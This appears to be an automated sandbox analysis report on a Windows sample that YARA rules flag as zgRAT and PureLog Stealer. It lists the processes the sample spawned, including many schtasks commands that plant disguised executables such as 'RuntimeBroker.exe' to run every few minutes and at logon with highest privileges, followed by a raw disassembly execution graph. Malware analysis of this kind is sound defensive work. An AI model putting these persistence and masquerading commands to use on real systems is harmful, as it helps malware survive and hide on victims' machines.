                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 83%, ReversingLabs
                                                          • Detection: 60%, Virustotal, Browse
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:5
                                                          Start time:23:42:15
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:6
                                                          Start time:23:42:15
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOw" /sc ONLOGON /tr "'C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:7
                                                          Start time:23:42:15
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:8
                                                          Start time:23:42:15
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.cmdline"
                                                          Imagebase:0x7ff667eb0000
                                                          File size:2'759'232 bytes
                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:9
                                                          Start time:23:42:15
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:11
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES69DB.tmp" "c:\Windows\System32\CSCAAFDA77B4B0340CF902F598B7E2DA6.TMP"
                                                          Imagebase:0x7ff78b860000
                                                          File size:52'744 bytes
                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:12
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 6 /tr "'C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:13
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOw" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:14
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 14 /tr "'C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:15
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:16
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:17
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:18
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 13 /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:19
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOw" /sc ONLOGON /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:20
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 13 /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:21
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 7 /tr "'C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:22
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOw" /sc ONLOGON /tr "'C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:23
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 6 /tr "'C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:24
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "bridgeServerFontSavesMonitorb" /sc MINUTE /mo 9 /tr "'C:\ChainBroker\bridgeServerFontSavesMonitor.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:26
                                                          Start time:23:42:17
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "bridgeServerFontSavesMonitor" /sc ONLOGON /tr "'C:\ChainBroker\bridgeServerFontSavesMonitor.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:27
                                                          Start time:23:42:17
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "bridgeServerFontSavesMonitorb" /sc MINUTE /mo 7 /tr "'C:\ChainBroker\bridgeServerFontSavesMonitor.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:29
                                                          Start time:23:42:17
                                                          Start date:09/01/2025
                                                          Path:C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe
                                                          Imagebase:0x360000
                                                          File size:14'385'664 bytes
                                                          MD5 hash:39953ACD4FD32884E6CAD0D1E4688051
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 83%, ReversingLabs
                                                          Has exited:true

                                                          General

                                                          Target ID:30
                                                          Start time:23:42:17
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FeErzF7oGb.bat"
                                                          Imagebase:0x7ff6aa700000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:31
                                                          Start time:23:42:17
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:32
                                                          Start time:23:42:17
                                                          Start date:09/01/2025
                                                          Path:C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe
                                                          Imagebase:0x8f0000
                                                          File size:14'385'664 bytes
                                                          MD5 hash:39953ACD4FD32884E6CAD0D1E4688051
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:33
                                                          Start time:23:42:17
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\chcp.com
                                                          Wow64 process (32bit):false
                                                          Commandline:chcp 65001
                                                          Imagebase:0x7ff7c4ae0000
                                                          File size:14'848 bytes
                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:34
                                                          Start time:23:42:17
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\w32tm.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                          Imagebase:0x7ff7c55f0000
                                                          File size:108'032 bytes
                                                          MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:35
                                                          Start time:23:42:19
                                                          Start date:09/01/2025
                                                          Path:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          Imagebase:0x8c0000
                                                          File size:14'385'664 bytes
                                                          MD5 hash:39953ACD4FD32884E6CAD0D1E4688051
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:36
                                                          Start time:23:42:19
                                                          Start date:09/01/2025
                                                          Path:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          Imagebase:0x430000
                                                          File size:14'385'664 bytes
                                                          MD5 hash:39953ACD4FD32884E6CAD0D1E4688051
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:38
                                                          Start time:23:42:22
                                                          Start date:09/01/2025
                                                          Path:C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                                          Imagebase:0xdc0000
                                                          File size:14'385'664 bytes
                                                          MD5 hash:39953ACD4FD32884E6CAD0D1E4688051
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 83%, ReversingLabs
                                                          • Detection: 60%, Virustotal, Browse
                                                          Has exited:true

                                                          General

                                                          Target ID:41
                                                          Start time:23:42:27
                                                          Start date:09/01/2025
                                                          Path:C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                                          Imagebase:0xe80000
                                                          File size:14'385'664 bytes
                                                          MD5 hash:39953ACD4FD32884E6CAD0D1E4688051
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:43
                                                          Start time:23:42:44
                                                          Start date:09/01/2025
                                                          Path:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\ChainBroker\bridgeServerFontSavesMonitor.exe"
                                                          Imagebase:0xb0000
                                                          File size:14'385'664 bytes
                                                          MD5 hash:39953ACD4FD32884E6CAD0D1E4688051
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:44
                                                          Start time:23:42:52
                                                          Start date:09/01/2025
                                                          Path:C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                                          Imagebase:0x10000
                                                          File size:14'385'664 bytes
                                                          MD5 hash:39953ACD4FD32884E6CAD0D1E4688051
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:9.6%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:9.3%
                                                            Total number of Nodes:1515
                                                            Total number of Limit Nodes:43
                                                            execution_graph 25392 be1bbd GetCPInfo IsDBCSLeadByte 23374 bef3b2 23375 bef3be __FrameHandler3::FrameUnwindToState 23374->23375 23406 beeed7 23375->23406 23377 bef3c5 23378 bef518 23377->23378 23381 bef3ef 23377->23381 23479 bef838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 23378->23479 23380 bef51f 23472 bf7f58 23380->23472 23383 bef42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23381->23383 23417 bf8aed 23381->23417 23391 bef48f 23383->23391 23475 bf7af4 38 API calls _abort 23383->23475 23389 bef40e 23425 bef953 GetStartupInfoW _abort 23391->23425 23393 bef495 23426 bf8a3e 51 API calls 23393->23426 23395 bef49d 23427 bedf1e 23395->23427 23400 bef4b1 23400->23380 23401 bef4b5 23400->23401 23402 bef4be 23401->23402 23477 bf7efb 28 API calls _abort 23401->23477 23478 bef048 12 API calls ___scrt_uninitialize_crt 23402->23478 23405 bef4c6 23405->23389 23407 beeee0 23406->23407 23481 bef654 IsProcessorFeaturePresent 23407->23481 23409 beeeec 23482 bf2a5e 23409->23482 23411 beeef1 23412 beeef5 23411->23412 23490 bf8977 23411->23490 23412->23377 23415 beef0c 23415->23377 23418 bf8b04 23417->23418 23419 befbbc _ValidateLocalCookies 5 API calls 23418->23419 23420 bef408 23419->23420 23420->23389 23421 bf8a91 23420->23421 23422 bf8ac0 23421->23422 23423 befbbc _ValidateLocalCookies 5 API calls 23422->23423 23424 bf8ae9 23423->23424 23424->23383 23425->23393 23426->23395 23628 be0863 23427->23628 23431 bedf3d 23677 beac16 23431->23677 23433 bedf46 _abort 23434 bedf59 GetCommandLineW 23433->23434 23435 bedf68 23434->23435 23436 bedfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23434->23436 23681 bec5c4 23435->23681 23692 bd4092 23436->23692 23441 bedf76 OpenFileMappingW 23444 bedf8f MapViewOfFile 23441->23444 23445 bedfd6 CloseHandle 23441->23445 23442 bedfe0 23686 bedbde 23442->23686 23449 bedfcd UnmapViewOfFile 23444->23449 23450 bedfa0 __InternalCxxFrameHandler 23444->23450 23445->23436 23449->23445 23454 bedbde 2 API calls 23450->23454 23456 bedfbc 23454->23456 23455 be90b7 8 API calls 23457 bee0aa DialogBoxParamW 23455->23457 23456->23449 23458 bee0e4 23457->23458 23459 bee0fd 23458->23459 23460 bee0f6 Sleep 23458->23460 23462 bee10b 23459->23462 23725 beae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 23459->23725 23460->23459 23463 bee12a DeleteObject 23462->23463 23464 bee13f DeleteObject 23463->23464 23465 bee146 23463->23465 23464->23465 23466 bee189 23465->23466 23467 bee177 23465->23467 23722 beac7c 23466->23722 23726 bedc3b 6 API calls 23467->23726 23470 bee17d CloseHandle 23470->23466 23471 bee1c3 23476 bef993 GetModuleHandleW 23471->23476 24011 bf7cd5 23472->24011 23475->23391 23476->23400 23477->23402 23478->23405 23479->23380 23481->23409 23494 bf3b07 23482->23494 23485 bf2a67 23485->23411 23487 bf2a6f 23488 bf2a7a 23487->23488 23508 bf3b43 DeleteCriticalSection 23487->23508 23488->23411 23537 bfc05a 23490->23537 23493 bf2a7d 7 API calls 2 library calls 23493->23412 23497 bf3b10 23494->23497 23496 bf3b39 23514 bf3b43 DeleteCriticalSection 23496->23514 23497->23496 23498 bf2a63 23497->23498 23509 bf3d46 23497->23509 23498->23485 23500 bf2b8c 23498->23500 23530 bf3c57 23500->23530 23503 bf2ba1 23503->23487 23505 bf2baf 23506 bf2bbc 23505->23506 23536 bf2bbf 6 API calls ___vcrt_FlsFree 23505->23536 23506->23487 23508->23485 23515 bf3c0d 23509->23515 23512 bf3d7e InitializeCriticalSectionAndSpinCount 23513 bf3d69 23512->23513 23513->23497 23514->23498 23516 bf3c26 23515->23516 23517 bf3c4f 23515->23517 23516->23517 23522 bf3b72 23516->23522 23517->23512 23517->23513 23520 bf3c3b GetProcAddress 23520->23517 23521 bf3c49 23520->23521 23521->23517 23528 bf3b7e ___vcrt_FlsFree 23522->23528 23523 bf3bf3 23523->23517 23523->23520 23524 bf3b95 LoadLibraryExW 23525 bf3bfa 23524->23525 23526 bf3bb3 GetLastError 23524->23526 23525->23523 23527 bf3c02 FreeLibrary 23525->23527 23526->23528 23527->23523 23528->23523 23528->23524 23529 bf3bd5 LoadLibraryExW 23528->23529 23529->23525 23529->23528 23531 bf3c0d ___vcrt_FlsFree 5 API calls 23530->23531 23532 bf3c71 23531->23532 23533 bf3c8a TlsAlloc 23532->23533 23534 bf2b96 23532->23534 23534->23503 23535 bf3d08 6 API calls ___vcrt_FlsFree 23534->23535 23535->23505 23536->23503 23538 bfc077 23537->23538 23541 bfc073 23537->23541 23538->23541 23543 bfa6a0 23538->23543 23540 beeefe 23540->23415 23540->23493 23555 befbbc 23541->23555 23544 bfa6ac __FrameHandler3::FrameUnwindToState 23543->23544 23562 bfac31 EnterCriticalSection 23544->23562 23546 bfa6b3 23563 bfc528 23546->23563 23548 bfa6c2 23554 bfa6d1 23548->23554 23576 bfa529 29 API calls 23548->23576 23551 bfa6cc 23577 bfa5df GetStdHandle GetFileType 23551->23577 23553 bfa6e2 _abort 23553->23538 23578 bfa6ed LeaveCriticalSection _abort 23554->23578 23556 befbc4 23555->23556 23557 befbc5 IsProcessorFeaturePresent 23555->23557 23556->23540 23559 befc07 23557->23559 23627 befbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23559->23627 23561 befcea 23561->23540 23562->23546 23564 bfc534 __FrameHandler3::FrameUnwindToState 23563->23564 23565 bfc558 23564->23565 23566 bfc541 23564->23566 23579 bfac31 EnterCriticalSection 23565->23579 23587 bf91a8 20 API calls _abort 23566->23587 23569 bfc546 23588 bf9087 26 API calls _abort 23569->23588 23572 bfc550 _abort 23572->23548 23574 bfc564 23575 bfc590 23574->23575 23580 bfc479 23574->23580 23589 bfc5b7 LeaveCriticalSection _abort 23575->23589 23576->23551 23577->23554 23578->23553 23579->23574 23590 bfb136 23580->23590 23582 bfc498 23604 bf8dcc 23582->23604 23584 bfc4ea 23584->23574 23586 bfc48b 23586->23582 23597 bfaf0a 23586->23597 23587->23569 23588->23572 23589->23572 23595 bfb143 _abort 23590->23595 23591 bfb183 23611 bf91a8 20 API calls _abort 23591->23611 23592 bfb16e RtlAllocateHeap 23593 bfb181 23592->23593 23592->23595 23593->23586 23595->23591 23595->23592 23610 bf7a5e 7 API calls 2 library calls 23595->23610 23612 bfac98 23597->23612 23600 bfaf4f InitializeCriticalSectionAndSpinCount 23603 bfaf3a 23600->23603 23601 befbbc _ValidateLocalCookies 5 API calls 23602 bfaf66 23601->23602 23602->23586 23603->23601 23605 bf8dd7 RtlFreeHeap 23604->23605 23606 bf8e00 _free 23604->23606 23605->23606 23607 bf8dec 23605->23607 23606->23584 23626 bf91a8 20 API calls _abort 23607->23626 23609 bf8df2 GetLastError 23609->23606 23610->23595 23611->23593 23613 bfacc8 23612->23613 23614 bfacc4 23612->23614 23613->23600 23613->23603 23614->23613 23618 bface8 23614->23618 23619 bfad34 23614->23619 23616 bfacf4 GetProcAddress 23617 bfad04 _abort 23616->23617 23617->23613 23618->23613 23618->23616 23620 bfad55 LoadLibraryExW 23619->23620 23621 bfad4a 23619->23621 23622 bfad8a 23620->23622 23623 bfad72 